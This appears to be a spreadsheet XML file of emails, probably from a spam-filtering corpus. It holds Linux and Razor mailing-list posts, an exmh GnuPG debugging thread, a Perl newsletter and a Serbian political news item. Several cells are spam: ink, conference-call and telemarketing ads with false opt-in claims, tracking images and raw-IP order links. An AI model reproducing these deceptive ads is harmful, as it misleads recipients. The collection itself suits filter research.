colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=47-ADxxn5Zo2oHFTNbx6YbHl3KeK9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Re: What's wrong with the Razor servers now?
</t>
  </si>
  <si>
    <t xml:space="preserve">Adam Goryachev wrote:
 &gt; Just my $1 worth...
 Should we trust you more because you're worth $1 instead of the usual 2 
 cents?
 ;)
 	Jehan
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] Re: [ILUG] Linux: the film.
</t>
  </si>
  <si>
    <t xml:space="preserve">[Moved from the ILUG list.  Not _entirely_ offlist as requested, but
 close enough.]
 Quoting Alan Horkan (horkana@tcd.ie):
 &gt; More likely we would try and get it when it comes out on video/dvd and
 &gt; show it then (which AFAIK is legal as we are non profit private
 &gt; organisation having a private showing and not charging our members for
 &gt; the showing. any opinions on the legality of this should be sent
 &gt; offlist).
 One bloke's opinion:
 Date: Sat, 01 Jun 2002 00:18:29 -0700
 From: "J.T.S. Moore" &lt;jtsmoore@pacificnet.net&gt;
 Reply-To: jtsmoore@pacificnet.net
 To: Marc MERLIN &lt;marc_news@vasoftware.com&gt;,
    Daniel Isacc Walker &lt;dwalker@cats.ucsc.edu&gt;
 CC: svlug@svlug.org, Rick Moen &lt;rick@linuxmafia.com&gt;, sluglug@sluglug.ucsc.edu,
    Peter Belew &lt;peterbe@sonic.net&gt;, "Eric A. Perlman" &lt;eric@yikes.com&gt;,
    i3e-off@cse.ucsc.edu, slug-web@sluglug.ucsc.edu
 Subject: REVOLUTION OS is now authorized for UC Santa Cruz screening
 To all,
 I have read the series of e-mails related to the unauthorized UC Santa
 Cruz screening that was scheduled for June 1.  I sincerely appreciate
 IEEE's good faith effort to correct the mistake.
 Consequently, so as not to inconvenience the people planning to attend
 the screening, I want to give IEEE and SlugLUG permission to screen
 REVOLUTION OS at 1 PM on June 1.  I would ask the members of SVLUG to
 hold off on attending the screening for the simple reason that I am
 trying to get REVOLUTION OS booked into the Camera 3 in San Jose, and I
 would prefer that SVLUG's members have a chance to see a nice 35mm print
 of the film.  If my distributor is unable to book the film into a
 theater in the Bay Area, I promise that I will work with SVLUG to
 quickly set up a screening for its members.
 I realize there may be some members of SlugLUG who are unhappy that I
 originally requested that they not hold an unauthorized screening of
 REVOLUTION OS.  There are several reasons why I made the request, and
 none of them have anything to do with me wanting to be a jerk.  
 One SlugLUG member commented that it was odd that a movie about the Open
 Source movement would not be available for open viewings.  Another
 SlugLUG member remarked that my request smacks of Bill Gates's Open Letter
 to Hobbyists.  
 The bottomline is that I did make a film about the Open Source movement,
 but to assume that automatically means that the film is itself Open
 Sourced seems to be a little bit of a stretch.  If I made a movie about
 the history of vegetarianism that would not automatically mean I'm a
 vegetarian.  
 I simply thought Open Source and Free Software were compelling subjects
 worth exploring and documenting.  As a result, I came to admire many
 aspects of the Open Source movement and chose to focus the documentary
 on the movement's positive history.  However, I do not think I should be
 punished for telling the story of Free Software and Open Source by
 having my intellectual property misappropriated.   More practically, my
 feelings about Open Sourcing REVOLUTION OS are abundantly clear when you
 see the explicit copyright notice at the end of the film's credits.  
 I realize that making a videotape copy for personal use from a TV airing
 is considered fair use.  I believe in a healthy fair use doctrine. 
 However, there is a big difference between viewing your personal copy at
 home with a few friends and holding a publicly advertised screening on a
 university campus.  So I freely admit my objection to unauthorized
 screenings of REVOLUTION OS does echo Bill Gates's letter.  Personally, I
 believe that the creator of a piece of intellectual property should
 retain the choice to Open Source their IP.  If the Open Source movement
 is not voluntary then it is really just piracy.
 One of the reasons I am concern with unauthorized group screenings of
 the film, is that my distributor is planning in a few weeks to begin
 selling VHS copies of the film for educational/institutional use with a
 license permitting noncommercial large group screenings.  We hope to use
 the money from these sales to fund the authoring and replication of the
 DVD.  I want to release the DVD as soon as possible, but I cannot afford
 to take on anymore REVOLUTION OS-related debt.  Thus the importance of
 preserving the educational/institutional market.
 Frequently, I will read comments on Slashdot and other mailing lists
 that justify the piracy of music on the grounds that it benefits the
 artists and only hurts the greedy record labels.  Well, in the case of
 REVOLUTION OS there is no multinational media conglomerate to punish. 
 It's just me.  I made and financed the film on my own.  I have worked
 full-time for almost three years without a salary.  The only way I will
 get out of debt and have a chance to make another film is if people seek
 out legal opportunities to view REVOLUTION OS.
 I truly appreciate the enthusiasm of the Open Source community for
 REVOLUTION OS, and I am grateful that people do want to see it.  If you
 will just bare with me, I will figure out a way for all interested
 persons to legally view it.
 I hope the dust up over the unauthorized, and now authorized, screening
 at UC Santa Cruz has not inconvenienced anyone.
 Sincerely,
 J.T.S. Moore
 Director, REVOLUTION OS
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Ink Prices Got You Down?              11956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</si>
  <si>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&lt;title&gt;Would You Like to Save up to 80&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#000000"&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
 &lt;table border=3D"3" width=3D"469" height=3D"83" bgcolor=3D"#000000" border=
 color=3D"#0000FF"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"48" align=3D"center" bordercolor=3D"#FFFF=
 FF"&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"5"&gt; Would You Like to
       &lt;b&gt; Save &lt;/b&gt;up to&lt;b&gt; &lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"5"=
  color=3D"#FFFFCC"&gt;80%&lt;/font&gt;&lt;/b&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" s=
 ize=3D"5"&gt;
       on &lt;b&gt;Printer&lt;/b&gt;, &lt;/font&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"5" color=3D=
 "#FF3300"&gt;Fax&lt;/font&gt;&lt;/b&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"5"=
 &gt;
       &amp;amp; &lt;/font&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"5" color=3D"#FFFFCC"&gt; =
 Copier&lt;/font&gt;&lt;/b&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"5"&gt; Suppl=
 ies?&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table border=3D"1" width=3D"469" height=3D"10" bordercolor=3D"#000000"&gt;
     &lt;tr&gt;
       &lt;td width=3D"53" height=3D"4" bordercolor=3D"#FFFFFF"&gt;&lt;b&gt;&lt;i&gt;&lt;font fa=
 ce=3D"Verdana" size=3D"2" color=3D"#FFFFFF"&gt;On
         Brands Like -&amp;gt;&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"81" height=3D"4" bgcolor=3D"#000099" align=3D"center"&gt;&lt;=
 font face=3D"Tahoma" size=3D"5" color=3D"#FFFFFF"&gt;EPSON&lt;/font&gt;&lt;/td&gt;
       &lt;td width=3D"74" height=3D"4" align=3D"center" bordercolor=3D"#CC000=
 0" style=3D"border-style: solid; border-width: 1" bordercolorlight=3D"#FF0=
 000" bordercolordark=3D"#CC0000" bgcolor=3D"#FFFFFF"&gt;&lt;font face=3D"Palatin=
 o Linotype" size=3D"4" color=3D"#CC0000"&gt;&lt;b&gt;Canon&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
       &lt;td width=3D"76" height=3D"4" align=3D"center" bgcolor=3D"#333399"&gt;&lt;=
 i&gt;&lt;b&gt;&lt;font face=3D"Arial" color=3D"#FFFFFF" size=3D"2"&gt;HEWLETT
         PACKARD&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
       &lt;td width=3D"101" height=3D"4" bgcolor=3D"#CC0000" align=3D"center"&gt;=
 &lt;font face=3D"Book Antiqua" color=3D"#FFFFFF" size=3D"5"&gt;Lexmark&lt;/font&gt;&lt;/t=
 d&gt;
       &lt;td width=3D"46" height=3D"4" align=3D"center" bordercolor=3D"#FFFFF=
 F"&gt;&lt;b&gt;&lt;i&gt;&lt;font face=3D"Verdana" size=3D"2" color=3D"#FFFFCC"&gt;&amp;amp;
         more!&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table border=3D"0" width=3D"469" height=3D"105"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" height=3D"33" bgcolor=3D"#FFFFCC" align=3D"center=
 "&gt;&lt;font color=3D"#CC0000" face=3D"Impact" size=3D"4"&gt;100%
         Quality Satisfaction Guarantee or Your Money Back!&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" height=3D"33" bgcolor=3D"#CC0000" align=3D"center=
 "&gt;&lt;font color=3D"#FFFFFF" face=3D"Impact" size=3D"4"&gt;FREE
         Same Day shipping on all US Orders*&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" height=3D"33" bgcolor=3D"#000080" align=3D"center=
 " style=3D"text-decoration: blink"&gt;&lt;font color=3D"#FFFFCC" face=3D"Impact"=
  size=3D"4"&gt;We'll
         beat ANY Price on the Internet - GUARANTEED!**&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table border=3D"0" width=3D"469" height=3D"38" bordercolor=3D"#000080"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" height=3D"32" align=3D"center" style=3D"border: 1=
  solid #000080"&gt;&lt;b&gt;&lt;a href=3D"http://61.151.247.39/erik/inkjets/" style=3D=
 "color: #FF0000"&gt;&lt;font face=3D"Tahoma" size=3D"5" color=3D"#FFFFFF"&gt;Click
         Here to ORDER NOW!&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table border=3D"0" width=3D"465" bgcolor=3D"#000080" height=3D"14"&gt;
     &lt;tr&gt;
       &lt;td width=3D"451" align=3D"center" bordercolor=3D"#FFFFFF" height=3D=
 "10"&gt;&lt;b&gt;&lt;font face=3D"Verdana" color=3D"#FFFFFF" size=3D"3"&gt;OR
         Call us Toll-Free at 1-800-758-8084!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;br&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table border=3D"1" width=3D"463" bordercolor=3D"#000080" height=3D"44"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" bordercolor=3D"#FFFFFF" height=3D"38"&gt;&lt;b&gt;&lt;font fa=
 ce=3D"Tahoma" size=3D"2" color=3D"#3366CC"&gt;*Free Shipping only on
         orders of $40 or more.&lt;br&gt;**We beat any online retailer's price by=
  5%.
         Call us with the URL (Website) advertising the lower price and onc=
 e we
         verify the price, we will beat it by 5%! (Must be same manufacture=
 r)&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table border=3D"1" width=3D"463" bordercolor=3D"#000080" height=3D"77"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" bordercolor=3D"#FFFFFF" align=3D"center" height=3D=
 "71"&gt;&lt;font face=3D"Tahoma" size=3D"1" color=3D"#3366CC"&gt;You
         are receiving this special offer because you have provided permiss=
 ion to
         receive email communications regarding special online promotions o=
 r
         offers. If you feel you have received this message in error, or wi=
 sh to
         be removed from our subscriber list, &lt;a href=3D"http://61.151.247.=
 39/erik/inkjets/remove.asp" style=3D"COLOR: #ff0000"&gt;Click
         HERE&lt;/a&gt; . Thank You and we apologize for ANY inconvenience.&lt;/font=
 &gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">2 things - first, the switch parser changed in a subtle way with 8.4 -
 byte-code compilation was added, and it is slightly more strict in
 its parsing than the original parser.  You can only have a comment where
 Tcl would expect to find a command.  Switch has a "pattern - body"
 strucutre, so if you goof and put a comment where it is trying to find
 a pattern, both of you will be confused with the results.  The
 subtlty arises with extra whitespace and newlines. I can't give you
 the exact case, but I know exmh had one example that stopped parsing
 correctly, and was arguably wrong before.
 2nd - I've managed to remain fairly ignoranat of the PGP support in
 exmh, so you'll have to dig in yourself or see if someone else on
 exmh-users or exmh-workers is having similar problems.
 &gt;&gt;&gt;Reg Clemens said:
  &gt; &gt; If you haven't already, you should enable the debug log under
  &gt; &gt; Hacking Support preferences and look for clues there.
  &gt; &gt; 
  &gt; &gt; &gt;&gt;&gt;Reg Clemens said:
  &gt; &gt;  &gt; &gt; Hi,
  &gt; &gt;  &gt; &gt; 
  &gt; &gt;  &gt; &gt; On Sun, 01 Sep 2002 00:05:03 MDT Reg Clemens wrote: 
  &gt; &gt;  &gt; &gt;   
  &gt; &gt;  &gt; &gt; [...]
  &gt; &gt;  &gt; &gt; &gt; in messages with GnuPG signatures.  But punching the line ALWAYS
  &gt; &gt;  &gt; &gt; &gt; gives
  &gt; &gt;  &gt; &gt; &gt; 
  &gt; &gt;  &gt; &gt; &gt;         Signature made Thu Aug 29 00:27:17 2002 MDT using DSA key I
      D BDD
  &gt; &gt;      F997A
  &gt; &gt;  &gt; &gt; &gt;         Can't check signature: public key not found
  &gt; &gt;  &gt; &gt; &gt; 
  &gt; &gt;  &gt; &gt; &gt; So, something else is missing.
  &gt; &gt;  &gt; &gt; 
  &gt; &gt;  &gt; &gt; Yes, the public key of the signature you want to check :-).
  &gt; &gt;  &gt; &gt; 
  &gt; &gt;  &gt; &gt; Are you really sure that you have the public key of the message's
  &gt; &gt;  &gt; &gt; signature? If not, try downloading it or try to check a signature fro
      m
  &gt; &gt;  &gt; &gt; which you know you have the public key.
  &gt; &gt;  &gt; &gt; 
  &gt; &gt;  &gt; &gt; 
  &gt; &gt;  &gt; &gt; 
  &gt; &gt;  &gt; 
  &gt; &gt;  &gt; Ah, sorry for not making that clearer.
  &gt; &gt;  &gt; But no.
  &gt; &gt;  &gt; Previously (v1.0.6 of GnuPG) there would be a slight pause at this poin
      t whi
  &gt; &gt;      le
  &gt; &gt;  &gt; it went out to get the public key from a keyserver.
  &gt; &gt;  &gt; Now, whether I have the key or NOT, I get the failure message.
  &gt; &gt;  &gt; 
  &gt; &gt;  &gt; Its as if it cant find gpg to execute it (but I fixed that path), so th
      ere
  &gt; &gt;  &gt; must be something else that I am missing...
  &gt; &gt;  &gt; 
  &gt; &gt;  &gt; 
  &gt; &gt;  &gt; -- 
  &gt; &gt;  &gt;                                         Reg.Clemens
  &gt; &gt;  &gt;                                         reg@dwf.com
  &gt; &gt;  &gt; 
  &gt; &gt;  &gt; 
  &gt; &gt;  &gt; 
  &gt; &gt;  &gt; 
  &gt; &gt;  &gt; _______________________________________________
  &gt; &gt;  &gt; Exmh-users mailing list
  &gt; &gt;  &gt; Exmh-users@redhat.com
  &gt; &gt;  &gt; https://listman.redhat.com/mailman/listinfo/exmh-users
  &gt; &gt; 
  &gt; &gt; --
  &gt; &gt; Brent Welch
  &gt; &gt; Software Architect, Panasas Inc
  &gt; &gt; Pioneering the World's Most Scalable and Agile Storage Network
  &gt; &gt; www.panasas.com
  &gt; &gt; welch@panasas.com
  &gt; &gt; 
  &gt; 
  &gt; 
  &gt; Partial solution.
  &gt; And this MAY be related to using tcl/tk 8.4b1, as I had a similar
  &gt; problem about a month ago elsewhere in EXMH (which you found).
  &gt; 
  &gt; But first.
  &gt; I really feel like something has changed out from under me
  &gt; with my making no changes to EXMH.  Namely, when I first got
  &gt; GPG up and working (for reading signatures) all I did was
  &gt; touch the 'Check Signature' button' and it went out and queried
  &gt; the keyserver for me.
  &gt; Now Im getting a separate box, after the failure to find the
  &gt; public key on my keyring, asking me of I want to 'Query keyserver'
  &gt; 
  &gt; I KNOW that I never had to touch a 'Query keyserver' button in
  &gt; the past, but there it is now, and I havent touched EXMH. Spooky.
  &gt; 
  &gt; I have been working back and forth between GPG 1.0.6 and 1.0.7
  &gt; but its not clear how that could be the problem, as Im now getting
  &gt; the 'Query' message when running either...
  &gt; 
  &gt; ---
  &gt; 
  &gt; OK, enough about my confusion.
  &gt; The CURRENT problem seems to be a COMMENT in a SWITCH statement
  &gt; at line 86 in pgpWWW.tcl.  Tcl 8.4b1 doesnt like it and I get your
  &gt; popup box.  Remove it and no popupbox, but EXMH hangs (sigh).
  &gt; So, not a complete solution, but at least a start.
  &gt; 
  &gt; Thanks for the interest.
  &gt; 
  &gt; 					Reg.Clemens
  &gt; 					reg@dwf.com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</si>
  <si>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Re: [ILUG] relating data from 2 ascii files ?
</t>
  </si>
  <si>
    <t xml:space="preserve">Cheers Padraig.
 Exactly what I needed.
 I knew I liked linux !!!
 Cheers,
 Declan
 On Wed, Aug 21, 2002 at 12:30:12PM +0100, Padraig Brady mentioned:
 &gt; 
 &gt; man join
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Mark wrote :
 &gt; I remember apt-get dist-upgrading from 7.2 to 7.3 fine, so it -should- 
 &gt; work, maybe :)
 I've done that too, on many production servers. The only little
 (unimportant) catch is to replace "kernel-headers" by "glibc-kernheaders",
 a simple "apt-get install glibc-kernheaders" taking care of that.
 Upgrading between releases is meant to work, not between betas or beta and
 releases. The reason is simple : Some packages may have been downgraded,
 some others may have been rebuilt with the same versions but different
 dependencies. For both these categories of packages, the upgrade through
 apt/rhn/whatever just won't do, as some older packages might be considered
 as the newest, thus being kept on the system.
 As Red Hat does, I really don't recommend trying to upgrade between betas
 or from a beta to a final release either. Simply backup your /home, /etc
 (and /root and/or /usr/local/ if needed) then reinstall cleanly, it'll
 probably save a few hassles and you'll get the cleanest possible system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</si>
  <si>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Low cost quality conference calls
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Lowest Rate Services&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-12=
 52"&gt;
 &lt;META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY vLink=3D#c0c0c0 link=3D#c0c0c0 bgColor=3D#000033 leftMargin=3D0&gt;&lt;FON=
 T 
 face=3Darial,helvetica&gt;
 &lt;P&gt;
 &lt;CENTER&gt;
 &lt;TABLE width=3D600 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;B&gt;&lt;FONT color=3D#999999 size=3D6&gt;Conferencing Made=
  Easy&lt;/FONT&gt;&lt;BR&gt;
 &lt;FONT color=3D#999999 size=3D5&gt;Only &lt;U&gt;18 Cents&lt;/U&gt; Per Minute!&lt;/B&gt;&lt;/FONT&gt;=
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#ff0000 size=3D5&gt;&lt;B&gt;(Including Long Distance!)&lt;/B&gt;&lt;/FONT&gt;=
 &lt;P&gt;
 &lt;TABLE width=3D350 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;FONT color=3D#999999 size=3D3&gt;&lt;B&gt;
       &lt;LI&gt;No setup fees 
       &lt;LI&gt;No contracts or monthly fees 
       &lt;LI&gt;Call anytime, from anywhere, to anywhere 
       &lt;LI&gt;Connects up to 100 Participants 
       &lt;LI&gt;Simplicity in set up and administration 
       &lt;LI&gt;Operator Help available 24/7 &lt;/B&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;=
 /TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D500 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#ff0000 size=3D60&gt;&lt;B&gt;&lt;FONT size=3D5&gt;T=
 he Highest Quality Service For The Lowest Rate In The Industry!&lt;/B&gt;&lt;/FONT&gt;=
 &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D400 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#999999 size=3D4&gt;Fill out the form be=
 low to find out how you can lower your phone bill every month.&lt;/FONT&gt;&lt;/TD&gt;=
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#999999 size=3D2&gt;Required Input Field&lt;FONT color=3D#ff000=
 0 
 size=3D2&gt;*&lt;/FONT&gt;&lt;/FONT&gt; 
 &lt;P&gt;
 &lt;TABLE cellSpacing=3D0 borderColorDark=3D#333300 cellPadding=3D3 width=3D6=
 00 
 borderColorLight=3D#ffffcc&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;
       &lt;FORM action=3Dmailto:aud.conf@b2b-mail.net?subject=3DAudioc_Inquiry=
       method=3Dpost encType=3Dtext/plain&gt;
       &lt;TABLE width=3D"100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#999999
           size=3D2&gt;Name&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DNAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#999999 size=3D2=
 &gt;Web 
             Address&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT value=3Dhttp:// name=3DURL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#999999 size=3D2=
 &gt;Company 
             Name&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DCOMPANY_NAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#999999 size=3D2=
 &gt;
             State&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT size=3D2 name=3DSTATE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#999999 size=3D2=
 &gt;Business 
             Phone&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DBUS_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#999999 size=3D2=
 &gt;Home 
             Phone&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DHOME_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#999999 size=3D2=
 &gt;Email 
             Address&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DEMAIL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#999999 size=3D2=
 &gt;Type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face=3D"Arial, Helvetica, sans-serif" color=3D=
 #999999 
       size=3D1&gt;To be removed from this list, send an e-mail to &lt;u&gt;remove@b=
 2b-mail.net&lt;/u&gt;&lt;br&gt;Type the word "remove" in the subject line.
       &lt;/FONT&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-09-06
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * Perl "Meetup"
 +--------------------------------------------------------------------+
 | Perl "Meetup"                                                      |
 |   posted by ziggy on Thursday September 05, @19:12 (news)          |
 |   http://use.perl.org/article.pl?sid=02/09/05/2316234              |
 +--------------------------------------------------------------------+
 [0]davorg writes "The people at [1]Meetup have set up a [2]Perl Meetup.
 The first one takes place on September 19th. I'll probably go along to
 the one in London to see what happens, but I'd be very interested in
 hearing any opinions on what this achieves that the existing Perl Mongers
 groups don't."
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/09/05/2316234
 Links:
     0. mailto:dave@dave.org.uk
     1. http://www.meetup.com/
     2. http://perl.meetup.com/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</si>
  <si>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Telemarketers earn $250+ per lead uio
</t>
  </si>
  <si>
    <t xml:space="preserve">Financial Services Company will pay a minimum of $250.00 (max. of $1000.00) for every lead that results in a sale.  Currently many of our Telemarketers are earning more than $5000.00 a month!
 For more information call (402) 996-9002 and leave your contact information.  We will get in touch with you within 2-3 business days.
 **Please note that we do not provide any training or resources to Telemarketers**
 To unsubscribe please send us an email with "UNSUBSCRIBE" in the subject line to: telemark_0702@hotmail.com.
 iqlexmqjxwsuwvipkjuuknnxif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</si>
  <si>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SPS se odrekao Slobodana Milosevica
</t>
  </si>
  <si>
    <t xml:space="preserve">
        Socijalisticka partija Srbije, predvodjena grupom starih socijalista na celu sa Milomirem Minicem, konacno se odrekla politike i herojskog drzanja predsednika te stranke Slobodana Milosevica, saopstenjima, da jedan ,,slabo obavesten covek ne moze, pogotovu ne iz zatvorske celije upravljati tako velikom partijom kao sto je Socijalisticka partija Srbije, pa zvao se on i Slobodan Milosevic''.
        Socijalisti koji za sebe danas kazu da vise nisu idolopoklonici Slobodana Milosevica, neprestano, u kontaktima sa clanovima i simpatizerima te partije, pokusavaju da razdvoje odbranu Slobodana Milosevica u Hagu, od politickog zivota u Srbiji, pripisujuci Milosevicevim braniocima iz nacionalnog komiteta za oslobadjanje S. Milosevica, ,,Sloboda'' da im je cilj da uniste Socijalisticku partiju Srbije.
         Iako je zbog istih takvih gledista, svojevremeno najpolularniji socijalista, posle predsednika te stranke, prof. Branislav Ivkovic bio iskljucen iz redova SPS, danas rukovodstvo SPS koristi jos teze i grublje kvalifikacije na racun njihovog predsednika, pritom ne strahujuci da bi bilo ko od njih mogao biti iskljucen iz partije.
         Ne retko se poslednjih dana, u rokovodstvu partije cuje da partija nije Slobodan Milosevic, i da on ne predstvalja tu partiju, vec da su partija Rukovodstvo i Glavni odbor te stranke.
         Medjutim u clanstvu i medju simpatizerima te stranke, stvari se ne odijaju bas po planovima rukovodstva.
